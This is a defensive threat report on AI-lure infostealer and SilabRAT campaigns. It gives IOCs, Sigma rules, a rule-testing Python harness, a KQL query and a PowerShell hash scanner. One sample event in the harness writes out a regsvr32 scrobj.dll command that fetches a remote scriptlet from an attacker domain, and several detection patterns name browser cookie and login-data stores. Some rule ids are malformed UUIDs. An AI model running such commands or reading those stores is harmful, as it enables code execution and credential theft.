Threat Summary
The latest OTX pulses indicate a convergence of threat activity leveraging the "AI hype cycle" to distribute advanced information stealers and Remote Access Trojans (RATs). Threat actors Storm-3075 and TroyDen are actively impersonating AI brands (e.g., ChatGPT, DeepSeek) via malvertising and social engineering to deliver payloads such as Vidar, Lumma Stealer, and Redline. Simultaneously, the threat actor o1oo1 is marketing the SilabRAT Malware-as-a-Service (MaaS) platform, which uses Hijack Loader to compromise systems and clones browser profiles for session hijacking. Taken together, these campaigns show a broader shift toward financially motivated credential theft and cryptocurrency hijacking, with infrastructure hosted on legitimate platforms such as GitHub and on compromised domains.
Threat Actor / Malware Profile
Storm-3075 (AI Impersonation)
- Malware: Vidar, Lumma Stealer, Oyster, GhostSocks.
- Distribution: Malvertising campaigns and SEO poisoning targeting users searching for AI tools.
- Behavior: Uses Hijack Loader to decrypt and inject shellcode. Focuses on stealing credentials, cookies, and cryptocurrency wallet data.
o1oo1 (SilabRAT Developer)
- Malware: SilabRAT, Hijack Loader, AsmCrypt.
- Distribution: Sold via dark web forums ($5,000/month). Delivered via malicious loaders.
- Behavior: Features Hidden VNC (hVNC) for stealthy remote control and clones the victim's browser profile so stolen session cookies can be replayed from the attacker's machine, bypassing MFA. Uses AsmCrypt for obfuscation.
TroyDen (Lure Factory)
- Malware: LuaJIT-based infostealers, Redline, Lumma Stealer.
- Distribution: GitHub repositories using AI-generated biological taxonomy names to lure developers and gamers.
- Behavior: Two-component payload designed to evade detection while targeting Roblox, crypto, and developer credentials.
IOC Analysis
- Domains & Hostnames: brokeapt.com, pan.rongtv.xyz, pan.ssffaa19.xyz. These serve as C2 servers or initial download locations for the malvertising chain. Block them at the perimeter and at the DNS layer.
- IPv4: 91.199.163.124. Identified as C2 infrastructure for the SilabRAT campaign. Block immediately.
- File Hashes (SHA256/SHA1): Multiple samples associated with Vidar, Lumma, and SilabRAT payloads (listed in the PowerShell hunt script below). Operationalize them by hashing files on disk and by comparing against Amcache, which records a SHA1 of executed binaries (computed over roughly the first 31 MB of the file). Shimcache and the $MFT do not store file hashes; use them to establish execution and creation timelines for any file that does match.
Detection Engineering
Sigma Rules
title: Potential Hijack Loader Stage via Regsvr32 or Rundll32 Script Proxy Execution
id: 4e8f3c9a-1a2b-4c6d-9e8f-1a2b3c4d5e6f
description: Detects regsvr32.exe or rundll32.exe launched with scrobj.dll or a vbscript handler on the command line (the scriptlet proxy-execution pattern), a loader stage associated with Hijack Loader in the Storm-3075 and SilabRAT campaigns. The rule keys on the command line only and does not verify DLL signatures.
status: experimental
date: 2026-06-11
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\regsvr32.exe'
      - '\rundll32.exe'
    CommandLine|contains:
      - 'scrobj.dll'
      - 'vbscript'
  condition: selection
falsepositives:
  - Legitimate administration scripts that register scriptlets through regsvr32
level: high
tags:
  - attack.defense_evasion
  - attack.t1218.010
  - attack.t1218.011
---
title: SilabRAT Browser Profile Cloning Activity
id: 5f9g4d0b-2b3c-5d7e-0f1g-2b3c4d5e6f7a
description: Detects non-browser processes reading browser credential and cookie stores (Chrome Login Data and Cookies, Firefox profile directories), consistent with SilabRAT profile cloning and Vidar stealer collection. Current Chrome and Edge builds keep the Cookies database under the profile's Network subfolder, so both locations are listed. The filter matches on image path suffix only, so a payload dropped as chrome.exe would slip past it; pair with signature or parent-process checks where telemetry allows.
status: experimental
date: 2026-06-11
author: Security Arsenal
logsource:
  category: file_access
  product: windows
detection:
  selection:
    TargetFilename|contains:
      - '\Google\Chrome\User Data\Default\Cookies'
      - '\Google\Chrome\User Data\Default\Network\Cookies'
      - '\Google\Chrome\User Data\Default\Login Data'
      - '\Mozilla\Firefox\Profiles\'
  filter_legit:
    Image|endswith:
      - '\chrome.exe'
      - '\firefox.exe'
      - '\msedge.exe'
  condition: selection and not filter_legit
falsepositives:
  - Backup software
  - Antivirus scans
  - Profile-sync or password-manager utilities
level: critical
tags:
  - attack.credential_access
  - attack.t1555.003
  - attack.t1005
---
title: OTX AI-Threat C2 Network Connection
id: 6g0h5e1c-3c4d-6e8f-1g2h-3c4d5e6f7a8b
description: Detects outbound connections to the C2 and download infrastructure listed for the Storm-3075 and SilabRAT campaigns (pulses of 2026-06-11). Hostnames are matched with contains on the parent domain so the pan.* subdomains in the IOC list, and any sibling subdomains, also match.
status: experimental
date: 2026-06-11
author: Security Arsenal
logsource:
  category: network_connection
  product: windows
detection:
  selection_domain:
    Initiated: 'true'
    DestinationHostname|contains:
      - 'brokeapt.com'
      - 'rongtv.xyz'
      - 'ssffaa19.xyz'
  selection_ip:
    Initiated: 'true'
    DestinationIp: '91.199.163.124'
  condition: 1 of selection*
falsepositives:
  - Unknown
level: critical
tags:
  - attack.command_and_control
  - attack.t1071
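Before shipping the three rules above to a SIEM, it is worth exercising their logic against a handful of hand-written events to confirm that the modifiers, the filter and the "1 of selection*" condition behave as intended. The script below is an added example, not part of the original report or of any Sigma tooling: it implements only the Sigma features these rules use (bare equality, endswith, contains, ANDed fields inside a selection, ORed list values, case-insensitive matching) and runs them over constructed sample events. The event contents are made up for illustration; the indicator strings are the ones listed in the IOC Analysis section.

```python
"""Minimal evaluator for the Sigma features used by the three rules above.

Added example: the events are constructed, the rule bodies mirror the corrected
Sigma rules, and only the modifiers those rules need are implemented.
"""

# Rule logic transcribed from the three Sigma rules. Each condition is a
# callable over {selection_name: matched?} so the three condition shapes
# (plain, "and not filter", "1 of selection*") are explicit.
RULES = {
    "proxy_exec": {
        "category": "process_creation",
        "selections": {
            "selection": {
                "Image|endswith": ["\\regsvr32.exe", "\\rundll32.exe"],
                "CommandLine|contains": ["scrobj.dll", "vbscript"],
            },
        },
        "condition": lambda s: s["selection"],
    },
    "browser_profile_access": {
        "category": "file_access",
        "selections": {
            "selection": {
                "TargetFilename|contains": [
                    "\\Google\\Chrome\\User Data\\Default\\Cookies",
                    "\\Google\\Chrome\\User Data\\Default\\Network\\Cookies",
                    "\\Google\\Chrome\\User Data\\Default\\Login Data",
                    "\\Mozilla\\Firefox\\Profiles\\",
                ],
            },
            "filter_legit": {
                "Image|endswith": ["\\chrome.exe", "\\firefox.exe", "\\msedge.exe"],
            },
        },
        "condition": lambda s: s["selection"] and not s["filter_legit"],
    },
    "c2_connection": {
        "category": "network_connection",
        "selections": {
            "selection_domain": {
                "Initiated": "true",
                "DestinationHostname|contains": ["brokeapt.com", "rongtv.xyz", "ssffaa19.xyz"],
            },
            "selection_ip": {"Initiated": "true", "DestinationIp": "91.199.163.124"},
        },
        # "1 of selection*": any selection whose name starts with "selection".
        "condition": lambda s: any(v for k, v in s.items() if k.startswith("selection")),
    },
}

# Constructed sample events; field names follow the Sigma Windows taxonomy.
EVENTS = [
    {"category": "process_creation", "Image": "C:\\Windows\\System32\\regsvr32.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://brokeapt.com/a.sct scrobj.dll"},
    {"category": "process_creation", "Image": "C:\\Windows\\System32\\regsvr32.exe",
     "CommandLine": "regsvr32 /s \"C:\\Program Files\\Vendor\\lib.dll\""},
    {"category": "file_access", "Image": "C:\\Users\\u\\AppData\\Local\\Temp\\update.exe",
     "TargetFilename": "C:\\Users\\u\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies"},
    {"category": "file_access", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "TargetFilename": "C:\\Users\\u\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    {"category": "network_connection", "Initiated": "true",
     "DestinationHostname": "pan.rongtv.xyz", "DestinationIp": "203.0.113.10"},
    {"category": "network_connection", "Initiated": "true",
     "DestinationHostname": "", "DestinationIp": "91.199.163.124"},
    {"category": "network_connection", "Initiated": "true",
     "DestinationHostname": "update.microsoft.com", "DestinationIp": "203.0.113.20"},
]


def field_matches(event, key, values):
    """Apply one 'Field|modifier: value(s)' line; list values are ORed, case-insensitive."""
    field, _, modifier = key.partition("|")
    actual = str(event.get(field, "")).lower()
    wanted = [str(v).lower() for v in (values if isinstance(values, list) else [values])]
    if modifier == "":
        return actual in wanted
    if modifier == "endswith":
        return any(actual.endswith(v) for v in wanted)
    if modifier == "contains":
        return any(v in actual for v in wanted)
    raise ValueError(f"modifier not implemented in this example: {modifier}")


def selection_matches(event, selection):
    """All field lines inside one selection must match (Sigma ANDs them)."""
    return all(field_matches(event, k, v) for k, v in selection.items())


def evaluate(rule, event):
    """True if the event is in the rule's log source category and satisfies its condition."""
    if event.get("category") != rule["category"]:
        return False
    results = {name: selection_matches(event, sel) for name, sel in rule["selections"].items()}
    return bool(rule["condition"](results))


def run(events=EVENTS, rules=RULES):
    """Return, per rule name, the indexes of the events that fire it."""
    return {name: [i for i, e in enumerate(events) if evaluate(rule, e)] for name, rule in rules.items()}


if __name__ == "__main__":
    for name, hits in run().items():
        print(f"{name}: fired on events {hits}")
```

The Chrome event deliberately uses the newer Network\Cookies path, the second process event shows an ordinary DLL registration not firing, and the IP-only connection fires through selection_ip even though no hostname was resolved. An inbound connection from the C2 address (Initiated false) does not fire, which is the intended scoping of the rule.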
KQL (Microsoft Sentinel)
// Hunt for network connections to IOCs from Pulse 1 and 3.
// RemoteUrl may carry a scheme, port or path, so an exact "in" list would miss
// hits; has_any on the parent domain also catches the pan.* subdomains.
let iocDomains = dynamic(["brokeapt.com", "rongtv.xyz", "ssffaa19.xyz"]);
let iocIp = "91.199.163.124";
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (iocDomains) or RemoteIP == iocIp
| extend IOCType = iff(RemoteIP == iocIp, "SilabRAT_C2_IP", "Storm_3075_Domain")
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort, IOCType
PowerShell Hunt Script
# IOC Scanner for Pulse 1 & 3 File Hashes
# The indicator list mixes one SHA1 and several SHA256 values. Hashing every
# file with SHA256 only would never match the SHA1 entry, so the targets are
# split by length and each file is checked with every algorithm that has indicators.
$TargetHashes = @(
    "4f5c5b3ef45cfff7721754487a86aeff9a2e6e32", # SHA1
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531", # SHA256
    "25270cc429ada8028b5b33220ed412c47907ecceea7377d608fac5af01bed56a",
    "5455341ed1bbe75a664fca2dd0794c508e1874f75360253a7ff5bc119bc92d80",
    "56d722b0331bf0aaa86bb37483486c6dff6ad9427fc473ed7c3226c21a9bdd23",
    "3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b",
    "79f8da9f9fb4ac7c16d9c210f1f6ef418357a3e7bf602b1dd03a490596fa58c5",
    "fb56e66920c84ef9e51db0ea23144f5755daef97cbff8613b05ab56d0dc9d623",
    "fbce30a0c852972fdc24f1b6a7c270512a50ef1a7c6c88c88b92a2dcbdfdd023"
)
$Sha1Targets   = @($TargetHashes | Where-Object { $_.Length -eq 40 } | ForEach-Object { $_.ToLower() })
$Sha256Targets = @($TargetHashes | Where-Object { $_.Length -eq 64 } | ForEach-Object { $_.ToLower() })

function Test-IocFile {
    # Returns "ALGO:hash" for the first indicator that matches the file, or $null.
    param([string]$FilePath)
    foreach ($Set in @(@{ Algo = 'SHA256'; Targets = $Sha256Targets }, @{ Algo = 'SHA1'; Targets = $Sha1Targets })) {
        if ($Set.Targets.Count -eq 0) { continue }
        $Hash = (Get-FileHash -LiteralPath $FilePath -Algorithm $Set.Algo -ErrorAction Stop).Hash.ToLower()
        if ($Set.Targets -contains $Hash) { return "$($Set.Algo):$Hash" }
    }
    return $null
}

Write-Host "Scanning for known IOCs..." -ForegroundColor Yellow

# Check running processes. Path is empty for protected processes and for
# processes the current token cannot open; those are skipped silently.
Get-Process -ErrorAction SilentlyContinue | ForEach-Object {
    try {
        $Path = $_.Path
        if ($Path -and (Test-Path -LiteralPath $Path)) {
            $Match = Test-IocFile -FilePath $Path
            if ($Match) {
                Write-Host "[ALERT] Malicious Process Found: $Path (PID: $($_.Id)) [$Match]" -ForegroundColor Red
            }
        }
    } catch {}
}

# Check common download and staging directories
$PathsToScan = @("$env:USERPROFILE\Downloads", "$env:TEMP", "$env:APPDATA")
foreach ($Path in $PathsToScan) {
    if (Test-Path -LiteralPath $Path) {
        Get-ChildItem -LiteralPath $Path -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
            try {
                $Match = Test-IocFile -FilePath $_.FullName
                if ($Match) {
                    Write-Host "[ALERT] Malicious File Found: $($_.FullName) [$Match]" -ForegroundColor Red
                }
            } catch {}
        }
    }
}
Write-Host "Scan Complete." -ForegroundColor Green
Response Priorities
- Immediate:
  - Block all listed IOCs (IP and domains) on perimeter firewalls, proxies, DNS filters, and EDR.
  - Hunt for the listed SHA256 and SHA1 file hashes across all endpoints (running processes, download and staging directories, Amcache entries).
- 24h:
  - Identify users who interacted with AI-themed lures or the suspicious GitHub repositories and verify their identities and active sessions.
  - Rotate credentials and revoke active sessions and tokens for any account found compromised during the artifact hunt. A cloned browser profile carries valid session cookies, so a password reset alone does not evict the attacker.
- 1 Week:
  - Harden against malvertising with DNS filtering and strict application allow-listing so loaders such as Hijack Loader cannot execute.
  - Review and restrict access to GitHub repositories outside the corporate-approved list to mitigate the TroyDen "Lure Factory" vector.